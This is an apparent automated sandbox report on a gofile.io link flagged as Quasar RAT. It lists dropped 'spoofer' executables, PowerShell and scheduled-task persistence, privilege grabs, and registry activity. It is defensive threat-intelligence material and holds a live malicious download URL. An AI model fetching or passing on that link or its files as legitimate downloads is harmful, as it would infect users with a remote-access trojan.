Analysis Overview
Threat Level: Known bad
The submitted URL http://gofile.io/d/Vw475K was found to be: Known bad.
Malicious Activity Summary
Quasar RAT
Quasar family
Quasar payload
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Loads dropped DLL
Looks up external IP address via web service
UPX packed file
Enumerates processes with tasklist
Browser Information Discovery
Uses Task Scheduler COM API
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Scheduled Task/Job: Scheduled Task
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SetWindowsHookEx
Suspicious use of SendNotifyMessage
Enumerates system info in registry
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-30 00:21
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-30 00:21
Reported
2024-10-30 00:27
Platform
win10v2004-20241007-en
Max time kernel
299s
Max time network
301s
Command Line
Signatures
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\Spoofers\Cleaner.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\Spoofers\Cleaner.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\Spoofers\Cleaner.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\Spoofers\Cleaner.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\Spoofers\Cleaner.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\Spoofers\Cleaner.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\Spoofers\PermWoofer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\Spoofers\PermWoofer.exe | N/A |
Loads dropped DLL
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A (64 UPX matches; no per-match detail is captured in this export) | N/A | N/A | N/A |
Browser Information Discovery
Enumerates system info in registry
All three BIOS key reads below belong to msedge.exe; they are not attributable to the dropped executables.
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
Every entry below is a ShellBag view-state write (Shell\BagMRU, Shell\Bags\N\ComDlg) by msedge.exe (file-save dialog) or OpenWith.exe; it records folder browsing during the detonation, not sample activity.
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0 = 5a003100000000005d5941be100053706f6f666572730000420009000400efbe5e59d5025e59d8022e0000005507000000001a0000000000000000000000000000004c272a01530070006f006f006600650072007300000018000000 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\SniffedFolderType = "Generic" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\SniffedFolderType = "Generic" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616193" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = ffffffff | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\NodeSlot = "5" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Mode = "1" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByDirection = "1" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0100000000000000ffffffff | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = 00000000ffffffff | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 3a001f44471a0359723fa74489c55595fe6b30ee260001002600efbe10000000388ddce19718db01256ef5219d18db01244f8af2612adb0114000000 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupView = "0" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:PID = "0" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
The 7zG.exe rows come from the archive extraction and the WMIC.exe rows are WMIC enabling its own privilege set; the rows tied to the sample are the SeDebugPrivilege grabs by PermWoofer.exe, Client.exe, and the powershell.exe and tasklist.exe they spawned.
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Downloads\Spoofers\PermWoofer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Downloads\Spoofers\PermWoofer.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://gofile.io/d/Vw475K
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
